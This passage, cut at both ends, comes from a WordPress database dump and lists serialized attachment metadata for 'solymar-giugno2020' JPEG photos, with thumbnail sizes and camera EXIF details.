:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0026-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0026-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0026-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592992146\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22195,1188,'_wp_attached_file','2020/10/solymar-giugno2020-0183-1.jpg'),(22196,1188,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:37:\"2020/10/solymar-giugno2020-0183-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0183-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0183-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0183-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0183-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0183-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0183-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0183-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0183-1-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0183-1-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0183-1-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0183-1-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0183-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0183-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0183-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0183-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1593016404\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22197,1189,'_wp_attached_file','2020/10/solymar-giugno2020-0033-1.jpg'),(22198,1189,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:37:\"2020/10/solymar-giugno2020-0033-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0033-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0033-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0033-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0033-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0033-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0033-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0033-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0033-1-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0033-1-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0033-1-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0033-1-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0033-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0033-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0033-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0033-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592992240\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22199,1190,'_wp_attached_file','2020/10/solymar-giugno2020-0035-1.jpg'),(22200,1190,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:37:\"2020/10/solymar-giugno2020-0035-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0035-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0035-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0035-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0035-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0035-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0035-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0035-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0035-1-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0035-1-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0035-1-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0035-1-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0035-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0035-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0035-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0035-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592992284\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"51\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:8:\"0.000625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22201,1191,'_wp_attached_file','2020/10/solymar-giugno2020-0040.jpg'),(22202,1191,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:853;s:6:\"height\";i:1280;s:4:\"file\";s:35:\"2020/10/solymar-giugno2020-0040.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0040-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0040-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0040-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0040-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0040-682x1024.jpg\";s:5:\"width\";i:682;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0040-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0040-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0040-830x1245.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:1245;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0040-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0040-230x345.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0040-350x525.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0040-480x720.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0040-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0040-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0040-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592992368\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"57\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22203,1192,'_wp_attached_file','2020/10/solymar-giugno2020-0041-1.jpg'),(22204,1192,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:37:\"2020/10/solymar-giugno2020-0041-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0041-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0041-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0041-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0041-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0041-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0041-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0041-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0041-1-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0041-1-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0041-1-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0041-1-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0041-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0041-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0041-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0041-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592992377\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22205,1193,'_wp_attached_file','2020/10/solymar-giugno2020-0042.jpg'),(22206,1193,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:35:\"2020/10/solymar-giugno2020-0042.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0042-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0042-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0042-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0042-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0042-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0042-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0042-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0042-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0042-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0042-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0042-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0042-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0042-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0042-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0042-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592992398\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22207,1194,'_wp_attached_file','2020/10/solymar-giugno2020-0044-1.jpg'),(22208,1194,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:37:\"2020/10/solymar-giugno2020-0044-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0044-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0044-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0044-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0044-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0044-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0044-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0044-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0044-1-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0044-1-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0044-1-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0044-1-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0044-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0044-1-300x375.jpg\";s:5: